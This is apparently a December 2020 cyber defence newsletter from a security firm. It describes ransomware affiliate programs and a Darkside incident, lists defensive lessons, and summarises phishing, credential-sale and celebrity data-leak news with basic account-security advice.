Cyber Defence Report - December 2020

The last report of what has been a crazy year in cyber security. Our Incident Response team has been busier than ever, and we are seeing ransomware attacks increasing by the day. Ransomware groups likes Conti, Egregor, RYUK and Darkside are attacking customers on a daily basis and we are seeing the technical skills for initial intrusion becoming more sophisticated with each attack. 

Many of the groups above operate affiliate sites that allow certain elements of the attack to be outsourced to third parties who share the bounty if the ransom is paid. 

Here's how such affiliate programs work: ransomware operators provide crypto-locking malware code to third parties. Each affiliate receives a version of code with their unique ID embedded. For every victim that pays a ransom, the affiliate shares the take with the ransomware operator.

Darkside ransom note (source: Bleeping Computer)

Darkside's terms and conditions state that their average payments to their affiliates are about $400,000 and the share paid to affiliates is 10% to 25%, depending on the size of the ransom.

Running an affiliate program like this allows just about anybody to distribute and profit from ransomware, it has also brought highly skilled individuals to the party especially if their skill is initial intrusion.   

On a recent incident response case, we came across the Darkside ransomware. CyberGuard’s investigation showed that even though the customer used certificates to control access to the VPN, the attackers had exploited a vulnerability in a unpatched firewall and stole the certificates to allow them access to the network. Once inside the network they stopped some additional security products and removed the existing anti-virus software before deploying the ransomware software. 

As we have got better at protecting users from email attacks or turned off vulnerable services like remote desktop protocol (RDP), the attackers have come up with new ways to penetrate companies; having a firewall and anti-virus is not enough on its own. 

Lessons learnt from this attack 

  • Patch everything not just PC's and servers
  • Get a regular penetration test (look at your network like a hacker would)
  • Invest in 24/7 monitoring (this attack always happens at night)
  • Have a robust IR and DR plan and make sure they are tested

In other news

Reported targeted attacks on the COVID-19 vaccine supply chain
A phishing campaign suspected of targeting entities associated with the COVID-19 vaccine supply chain has been seen. The emails are fairly well written and contain succinct technical information that corresponds to the spoofed sender’s company. Attached to the emails is an HTML file that unlocks when users enter their login credentials. While the immediate intent appears to be to harvest credentials, the ultimate objective is unconfirmed; possibilities include enabling access brokerage to victim networks, Business Email Compromise (BEC) operations, and the sale of credentials to other adversaries.

C-Suite Office 365 credentials advertised on criminal forum 
On 25 November 2020, CrowdStrike Intelligence observed an English-speaking threat actor advertise credentials for C-Suite level personnel on multiple criminal forums. The credentials were advertised from $100 - $1500 USD depending on the company. The threat actor also expressed interest in logs obtained from information stealing malware including Smoke Bot, Racoon Stealer, and Azorult stealer, likely to obtain additional information to sell.

CrowdStrike Intelligence is unable to verify the legitimacy of the credentials at this time. C-Suite credentials - as well as those of personnel dealing with finances and accounts - are particularly useful for criminals looking to engage in Business Email Compromise (BEC), particularly CEO fraud. I checked the list and mine are not on there!

Personal data leaks reveal private pictures of female British athletes
The private pictures of four female British athletes have been posted online following a cyber attack targeting sport stars and celebrities.  One of the incidents included private images being stolen from iCloud and the process has begun to remove these from the dark net. Accessing and leaking someone’s personal data is utterly reprehensible. 

Everyone should take steps, where possible, to secure their accounts. Turning on two-factor authentication will give you an additional layer of protection and reduce the likelihood of a hack taking place. A strong password made up of three random words is also a good way to defend your data. 

Make sure you protect all those devices you get from Santa this year!

Thanks to Kaspersky, CrowdStrike, NCSC and bleeping computer for the intelligence.

Stay safe 
Paul